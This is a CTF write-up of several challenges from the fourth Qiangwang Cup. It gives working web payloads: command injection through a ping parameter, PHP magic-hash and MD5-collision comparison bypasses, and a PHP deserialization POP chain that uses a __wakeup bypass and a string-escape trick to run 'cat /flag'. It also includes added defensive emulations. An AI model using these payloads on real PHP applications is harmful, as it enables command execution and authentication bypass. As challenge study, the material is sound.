Preface

I first came into contact with security through the second 强网杯, and now it is the fourth, so it has been a little over two years. Although no single day in those two years seemed to bring any progress, looking back over them as a whole I find I have learned so much that it is hard to believe; I can hardly imagine that I have actually become somewhat capable. Heh.




签到 (Sign-in)




Flag: flag{welcome_to_qwb_S4}



主动 (Active)


Opening the link shows the source code.


From the source we can see that whatever is passed in the GET parameter ip is pinged, and that a case-insensitive regex filters out the string flag.

This is clearly a command injection; any of the following characters can be used to terminate the ping command and append another one:

&
;
|
$
`
||

First locate the flag. Because flag is filtered, use a wildcard (*), a question mark (?), or string/variable concatenation instead, then search for it with find:

http://39.96.23.228:10002/?ip=1.1.1.1;find%20/%20-name%20fla*


The flag can then be read with cat; because the output is wrapped in HTML tags, look for it in the page source.
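The defensive side of this, as an added example that is not part of the original writeup: a case-insensitive blocklist on the word flag leaves every separator listed above untouched, whereas treating the parameter as an IP address and never handing it to a shell removes the injection. The function names and the ping command line are my own emulation, not the challenge's PHP.

```python
import ipaddress
import re
import subprocess

# Shell separators from the writeup that a "flag" blocklist never looks at.
SEPARATORS = ["&", ";", "|", "$", "`", "||"]

def blocklist_passes(ip: str) -> bool:
    """The challenge's filter as described: reject only the substring 'flag', case-insensitively."""
    return re.search(r"flag", ip, re.IGNORECASE) is None

def build_shell_command(ip: str) -> str:
    """The vulnerable pattern: user input spliced into a shell command string (emulation)."""
    return f"ping -c 1 {ip}"

def is_ip_address(ip: str) -> bool:
    """Allow-list check: the parameter must parse as an IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return False
    return True

def safe_ping(ip: str) -> subprocess.CompletedProcess:
    """Hardened version: validate first, then pass argv as a list so no shell is involved."""
    if not is_ip_address(ip):
        raise ValueError("ip parameter is not an IP address")
    return subprocess.run(["ping", "-c", "1", ip], capture_output=True, text=True, timeout=10)

def classify(ip: str) -> dict:
    """Compare both checks on one input: what the blocklist lets through vs. what the allow-list accepts."""
    return {
        "blocklist_allows": blocklist_passes(ip),
        "allowlist_allows": is_ip_address(ip),
        "has_separator": any(sep in ip for sep in SEPARATORS),
        "shell_command": build_shell_command(ip),
    }
```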




Flag: flag{I_like_qwb_web}



upload

The attachment turns out to be a packet capture, so this is a misc challenge.


Following the TCP stream shows that an image was uploaded.


Copy the raw data out and paste it into Notepad++.


First remove the extra line breaks.


Then find 0d0a0d0affd8 and delete everything before ffd8 (ffd8 is the JPEG file header), then copy the whole thing.


In 010 Editor, create a new file and choose paste from hex string.


Save.
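The same carving steps as a script, as an added example that is not part of the original writeup: strip the line breaks, find the 0d0a0d0a ffd8 boundary, keep everything from ffd8 to the ffd9 end marker, and decode the hex. The sample dump is constructed and the helper names are my own.

```python
import re

JPEG_SOI = "ffd8"        # start-of-image marker, the "file header" the writeup looks for
JPEG_EOI = "ffd9"        # end-of-image marker
HEADER_END = "0d0a0d0a"  # CRLF CRLF: end of the HTTP headers in the upload stream

def find_aligned(hexstr: str, needle: str, start: int = 0) -> int:
    """str.find() restricted to even offsets so hex pairs stay on byte boundaries."""
    pos = hexstr.find(needle, start)
    while pos != -1 and pos % 2:
        pos = hexstr.find(needle, pos + 1)
    return pos

def carve_jpeg_hex(raw_hex: str) -> bytes:
    """Turn a copied hex dump of the upload stream into the JPEG bytes.

    Mirrors the manual steps: drop line breaks and spaces, locate the first
    CRLFCRLF followed by ffd8, discard everything before ffd8, stop after ffd9.
    """
    compact = re.sub(r"[^0-9a-fA-F]", "", raw_hex).lower()
    pos = find_aligned(compact, HEADER_END + JPEG_SOI)
    if pos == -1:
        raise ValueError("no CRLFCRLF + ffd8 boundary found in dump")
    start = pos + len(HEADER_END)
    end = find_aligned(compact, JPEG_EOI, start + len(JPEG_SOI))
    stop = len(compact) if end == -1 else end + len(JPEG_EOI)  # keep a truncated image rather than fail
    return bytes.fromhex(compact[start:stop])

# Constructed sample: "POST /upload HTTP/1.1", "Host: example", CRLFCRLF, then a stand-in JPEG
# (SOI, a JFIF APP0 segment, EOI), broken across lines the way a copied raw view is.
SAMPLE_DUMP = """504f5354202f75706c6f616420485454502f312e310d0a
486f73743a206578616d706c650d0a0d0a
ffd8ffe000104a46494600010100
000100010000ffd9"""

if __name__ == "__main__":
    with open("carved.jpg", "wb") as fh:
        fh.write(carve_jpeg_hex(SAMPLE_DUMP))
```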


The image mentions steghide; steghide is a tool, so let's try it.


It asks for a passphrase; I tried 123456 on a whim and it worked.




Flag: flag{te11_me_y0u_like_it}



Funhash


From the source we can see that the value passed in must equal its own MD4 hash. Because the comparison is not strict, this can be bypassed with a 0e value. I wrote a script for it, but it ran for a long time without finding anything:

# -*- coding: utf-8 -*-
from subprocess import PIPE, Popen
import multiprocessing
import random
import sys
import re

CHARS = "0123456789"

def cmp_md5(substr, stop_event, str_len, start=0, size=20):
    while not stop_event.is_set():

        # random digit string
        rnds = ''.join(random.choice(CHARS) for _ in range(size))

        # prepend the fixed 0e header
        value = '0e' + rnds

        # call PHP's md4 through the helper script aaa.php
        proc = Popen(r'C:\phpstudy_pro\Extensions\php\php7.3.4nts\php.exe C:\phpstudy_pro\WWW\aa\html\aaa.php ' + value, stdout=PIPE, stderr=PIPE)
        output = proc.communicate()[0].decode()

        # a "magic" hash is 0e followed by digits only
        if re.findall(r'^\d*$', output[2:]):
            print(output[2:])

            if output[start:str_len] == substr:
                print(rnds + "=>" + value + "=>" + output + "\n")
                stop_event.set()


if __name__ == '__main__':
    # the prefix to match, with surrounding whitespace stripped
    #substr = sys.argv[1].strip()
    substr = "0e"

    # start position
    #start_pos = int(sys.argv[2]) if len(sys.argv) > 1 else 0
    start_pos = 0

    # end position
    str_len = len(substr) + start_pos

    # number of worker processes (the cpu_count() value is overridden with 5)
    cpus = multiprocessing.cpu_count()
    cpus = 5

    stop_event = multiprocessing.Event()
    processes = [multiprocessing.Process(target=cmp_md5, args=(substr,
                                         stop_event, str_len, start_pos))
                 for i in range(cpus)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()

aaa.php

<?php 
echo hash("md4", $argv[1]);

Then I found this online: https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4

#!/usr/bin/env python
import hashlib
import re

prefix = '0e'

def breakit():
    iters = 0
    while 1:
        s = (prefix + str(iters)).encode('utf-8')
        # hashlib's md4 comes from OpenSSL; with OpenSSL 3 it needs the legacy provider
        hashed_s = hashlib.new('md4', s).hexdigest()
        iters = iters + 1
        # 0e followed by 30 digits fills the whole 32-character digest
        r = re.match('^0e[0-9]{30}', hashed_s)
        if r:
            print("[+] found! md4( {} ) ---> {}".format(s, hashed_s))
            print("[+] in {} iterations".format(iters))
            return
        if iters % 1000000 == 0:
            print("[+] current value: {}       {} iterations, continue...".format(s, iters))

breakit()


Level two: I had run into different values with the same MD5 in an earlier CTF: https://blog.csdn.net/qq_42967398/article/details/104522626

<?php

$s1 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab";
$s2 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%5f%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%f3%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%e9%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%13%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%a8%1b%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%39%05%39%95%ab";
$s3 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%16%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%33%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab";
var_dump(md5(urldecode($s1)));
var_dump(md5(urldecode($s2)));
var_dump(md5(urldecode($s3)));

// result
# string(32) "ea8b4156874b91a4ef00c5ca3e4a4a34"
# string(32) "ea8b4156874b91a4ef00c5ca3e4a4a34"
# string(32) "ea8b4156874b91a4ef00c5ca3e4a4a34"

Level three: a Baidu search turned up https://blog.csdn.net/March97/article/details/81222922. As long as the raw output of md5($password, true) contains 'or' followed by a digit, the query returns true.



So the final payload is

http://39.101.177.96/
?hash1=0e251288019
&hash2=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab
&hash3=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%16%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%33%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab
&hash4=129581926211651571912466741651878684928
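The two PHP comparison pitfalls behind levels one and three, emulated in Python as an added example that is not part of the original writeup: == treats two numeric-looking strings (the page's hash1 value 0e251288019 and any 0e... digest) as the number 0, and md5($p, true) returns raw bytes that can contain a quote. The inputs 240610708, QNKCDZO and ffifdyop are published magic values that I supply, not values from the page, and the helper names are mine.

```python
import hashlib
import re

# PHP's notion of a numeric string (leading whitespace, optional sign, optional exponent).
# A digest like 0e462097... matches it and is read as 0 * 10^462097..., i.e. 0.
NUMERIC_STRING = re.compile(r"^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?$")

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def php_loose_equals(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings: if both are numeric strings, compare them as numbers."""
    if NUMERIC_STRING.match(a) and NUMERIC_STRING.match(b):
        return float(a) == float(b)
    return a == b

def php_strict_equals(a: str, b: str) -> bool:
    """PHP's ===: identical characters, no numeric coercion."""
    return a == b

def is_magic_hash(hexdigest: str) -> bool:
    """0e followed only by digits: the form every 'magic' hash in this challenge has."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None

def magic_hash_pair(a: str, b: str) -> dict:
    """Two different inputs whose md5 digests are both magic compare equal under == but not ===
    (md5 stands in for the challenge's md4; the mechanism is the same)."""
    da, db = md5_hex(a), md5_hex(b)
    return {"loose": php_loose_equals(da, db), "strict": php_strict_equals(da, db)}

def raw_md5_breaks_sql_string(password: str) -> bool:
    """Level 3: md5($p, true) yields raw bytes. If they contain 'or'<non-zero digit>, a query built as
    "... password='" . md5($p, true) . "'" gets its string closed and an always-true test appended."""
    raw = hashlib.md5(password.encode()).digest()
    return re.search(rb"'or'[1-9]", raw, re.IGNORECASE) is not None
```

On the PHP side the fix for the first pitfall is === (or hash_equals()) instead of ==, and for the third a parameterised query instead of interpolating a raw digest into SQL.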




Flag: flag{y0u_w1ll_l1ke_h4sh}



web辅助 (web assist)


First, understand the source. I have added comments throughout; there are four files. index.php:

<?php
@error_reporting(0);
require_once "common.php";
require_once "class.php";

# check that both username and password were supplied
if (isset($_GET['username']) && isset($_GET['password'])){
    $username = $_GET['username'];
    $password = $_GET['password'];

    # create a new player object from username and password
    $player = new player($username, $password);

    # serialize $player, run it through write(), and save it to caches/<md5 of the client IP>
    file_put_contents("caches/".md5($_SERVER['REMOTE_ADDR']), write(serialize($player))); 

    # print the name and the current source IP
    echo sprintf('Welcome %s, your ip is %s\n', $username, $_SERVER['REMOTE_ADDR']);
}
else{
    echo "Please input the username or password!\n";
}

?>

common.php

<?php
function read($data){
    # turn the literal \0*\0 back into chr(0)."*".chr(0)
    $data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
    return $data;
}
function write($data){
    # turn chr(0)."*".chr(0) into the literal \0*\0
    $data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
    return $data;
}

function check($data)
{
    // the string "name" is not allowed anywhere (case-insensitive)
    if(stristr($data, 'name')!==False){
        die("Name Pass\n");
    }
    else{
        return $data;
    }
}
?>

class.php

<?php
class player{
    protected $user;
    protected $pass;
    protected $admin;

    public function __construct($user, $pass, $admin = 0){
        # constructor; admin defaults to 0
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }

    public function get_admin(){
        # returns the object's admin property
        return $this->admin;
    }
}

class topsolo{
    protected $name;

    public function __construct($name = 'Riven'){
        $this->name = $name;
    }

    public function TP(){
        # if name is a function or an object, call it
        if (gettype($this->name) === "function" or gettype($this->name) === "object"){
            $name = $this->name;
            $name();
        }
    }

    public function __destruct(){
        # destructor: when the object is destroyed, call TP()
        $this->TP();
    }

}

class midsolo{
    protected $name;

    public function __construct($name){
        $this->name = $name;
    }

    public function __wakeup(){
        # runs when the object is unserialized: if name is not Yasuo, reset it to Yasuo and print a message
        if ($this->name !== 'Yasuo'){
            $this->name = 'Yasuo';
            echo "No Yasuo! No Soul!\n";
        }
    }


    public function __invoke(){
        # runs when the object is called as a function: call Gank()
        $this->Gank();
    }

    public function Gank(){
        # check whether name contains the string Yasuo
        if (stristr($this->name, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }
}

class jungle{
    protected $name = "";

    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }

    public function KS(){
        # print the flag
        system("cat /flag");
    }

    public function __toString(){
        # runs when the object is used as a string: call KS()
        $this->KS();  
        return "";  
    }

}
?>

play.php

<?php
@error_reporting(0);
require_once "common.php";
require_once "class.php";

# read the serialized cache file
@$player = unserialize(read(check(file_get_contents("caches/".md5($_SERVER['REMOTE_ADDR'])))));
# print the unserialized result; everything below is irrelevant
print_r($player);
if ($player->get_admin() === 1){
    echo "FPX Champion\n";
}
else{
    echo "The Shy unstoppable\n";
}
?>

1. Normal flow: username and password are passed in, a player object from class.php is built from them, serialized, formatted by the write function in common.php, and finally saved under caches/.


2. Visiting play.php reads the serialized cache file, passes it through check and read from common.php, unserializes it, prints the result, and then tests whether it is admin.


Approach:

1. index.php takes two parameters and the data is unserialized later, so we can hand it a serialized string of our own. The first step is to build a serialized object that reads the flag.

  • The KS method of the jungle class reads the flag; it is triggered when the object is used as a string (__toString).


  • To get jungle used as a string, the Gank method of the midsolo class calls stristr on name, which checks whether one string contains another and so coerces its argument to a string. Gank is called from the __invoke magic method, which only runs when the object is called as a function.


  • Calling the object as a function happens in the TP method of the topsolo class: if the name passed in is a function or an object, it is invoked. TP is called from the __destruct magic method (the destructor, which runs when the object is destroyed).

  • That completes the POP chain. Append the following statement to the end of class.php; because my Windows machine has no /flag, I echo 11111 in place of the flag.

   new topsolo(new midsolo(new jungle));


  • Visiting class.php in the browser shows that KS is called successfully.


  • When going through unserialize, though, the flag is not read:

<?php
require_once "common.php";
require_once "class.php";   // the classes used below are defined in class.php

$a = new topsolo(new midsolo(new jungle));
$b = serialize($a);
echo "<br/>". write($b) ."<br/>";

unserialize($b);


  • Because the __wakeup magic method of midsolo replaces name during unserialization, jungle can no longer be used as a string.


  • I then found CVE-2016-7124 to bypass __wakeup: when the property count in the serialized object is larger than the real number of properties, __wakeup is skipped => link

<?php
require_once "common.php";
require_once "class.php";

// midsolo declares 2 properties but carries only 1, so __wakeup is skipped (CVE-2016-7124)
$b = 'O:7:"topsolo":1:{s:7:"\0*\0name";O:7:"midsolo":2:{s:7:"\0*\0name";O:6:"jungle":1:{s:7:"\0*\0name";s:7:"Lee Sin";}}}';
$b = read($b);

unserialize($b);
echo "<br/><br/>";



  • In the real flow there is also the check function in common.php, which filters the string name; if the serialized data contains name it cannot be unserialized.

<?php
require_once "common.php";
require_once "class.php";

// same path as play.php: check() dies on "name" before read() and unserialize() run
$b = file_get_contents("caches/".md5($_SERVER['REMOTE_ADDR']));
$b = read(check($b));

unserialize($b);
echo "<br/><br/>";



  • We need hex encoding to get around it, and the string type tag must be a capital S (the S: form is what allows \hh escapes):
O:7:"topsolo":1:{S:7:"\0*\0nam\65";O:7:"midsolo":2:{S:7:"\0*\0nam\65";O:6:"jungle":1:{S:7:"\0*\0nam\65";s:7:"Lee Sin";}}}


  • But the serialized player object has only three properties, so we need serialization string escaping => link. Because the read function turns each 5-character \0*\0 into 3 characters, every occurrence eats the next two characters.

  • We need the part highlighted in the screenshot (from the closing quote of username up to the password's length header) to be eaten; with the two extra backslashes its length is 22.


  • So 11 groups of \0*\0 are needed, and the property name ;s:7:"\0*\0pass"; must be prepended to the serialized chain. The final payload:

http://192.168.121.1/aa/html/
?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
&password=;s:7:"\0*\0pass";O:7:"topsolo":1:{S:7:"\0*\0nam\65";O:7:"midsolo":2:{S:7:"\0*\0nam\65";O:6:"jungle":1:{S:7:"\0*\0nam\65";s:7:"Lee Sin";}}}
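The length arithmetic of the last two steps, emulated in Python as an added example that is not part of the original writeup: it reproduces write(), read() and serialize() for the player class, consumes the username the way unserialize() does (trusting the s:N: header), and returns the bytes that the header swallows past the real username. The helper names are mine; the player layout follows class.php above.

```python
import re

# Constructed emulation of common.php: write() stores the 3-byte protected-property marker
# chr(0)."*".chr(0) as the 5-character literal \0*\0 and read() reverses it, but the s:N:
# headers written by serialize() are never updated, so a literal \0*\0 that was already in
# the stored data makes its string 2 bytes shorter than the header claims.
NUL_MARK = "\x00*\x00"
LITERAL_MARK = r"\0*\0"

def php_write(data: str) -> str:
    return data.replace(NUL_MARK, LITERAL_MARK)

def php_read(data: str) -> str:
    return data.replace(LITERAL_MARK, NUL_MARK)

def serialize_player(user: str, password: str) -> str:
    """Emulates PHP serialize() for class player { protected $user, $pass, $admin = 0; }."""
    def key(name: str) -> str:  # protected properties are keyed "\0*\0name"
        return f's:{len(NUL_MARK) + len(name)}:"{NUL_MARK}{name}";'
    return ('O:6:"player":3:{'
            + key("user") + f's:{len(user)}:"{user}";'
            + key("pass") + f's:{len(password)}:"{password}";'
            + key("admin") + 'i:0;}')

def over_read(loaded: str):
    """Consume the user property as unserialize() does: read exactly the N bytes the header names."""
    m = re.match(r'O:6:"player":3:\{s:7:"\x00\*\x00user";s:(\d+):"', loaded)
    n, start = int(m.group(1)), m.end()
    return loaded[start:start + n], loaded[start + n:]

def escaped_tail(user: str, password: str):
    """Returns (bytes swallowed past the real username, text where parsing resumes)."""
    stored = php_write(serialize_player(user, password))  # what index.php writes to caches/
    loaded = php_read(stored)                              # what play.php hands to unserialize()
    content, rest = over_read(loaded)
    real_len = len(user) - 2 * user.count(LITERAL_MARK)    # username after read() shrank by 2 per group
    return content[real_len:], rest

def groups_needed(tail: str) -> int:
    """Each literal \0*\0 in the username swallows 2 bytes, so the tail length must be even."""
    if len(tail) % 2:
        raise ValueError("tail length is not a multiple of 2")
    return len(tail) // 2

# The writeup's payload: 11 marker groups as username, the chain as password.
USERNAME = LITERAL_MARK * 11
PASSWORD = (';s:7:"\\0*\\0pass";O:7:"topsolo":1:{S:7:"\\0*\\0nam\\65";'
            'O:7:"midsolo":2:{S:7:"\\0*\\0nam\\65";'
            'O:6:"jungle":1:{S:7:"\\0*\\0nam\\65";s:7:"Lee Sin";}}}')
```

A defender can catch this record before unserialize() sees it by re-checking, after read(), that every s:N: header still matches its string; any lossy transform between serialize() and unserialize() reopens this class of bug.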


  • I found a CTF challenge very similar to this one => link
  • Some notes on deserialization vulnerabilities I came across along the way => link link link



Flag: flag{a5e9e444-29ef-4549-a61f-530e880b56a1}



miscstudy

I did not finish this one: there are seven stages in total and I got stuck at the second.

  • Open the capture, filter on http, select the second entry, and double-click the blue link.


  • This yields the first part of the flag and a file for decrypting SSL in Wireshark.


  • Save the contents of that page to a file and import it into Wireshark.


  • Looking again, a request for an image is now visible; after downloading the image I got stuck and did not know how to proceed.




Final ranking






Last modified: August 25, 2020

Comments

Author

Had a lot of fun this time.
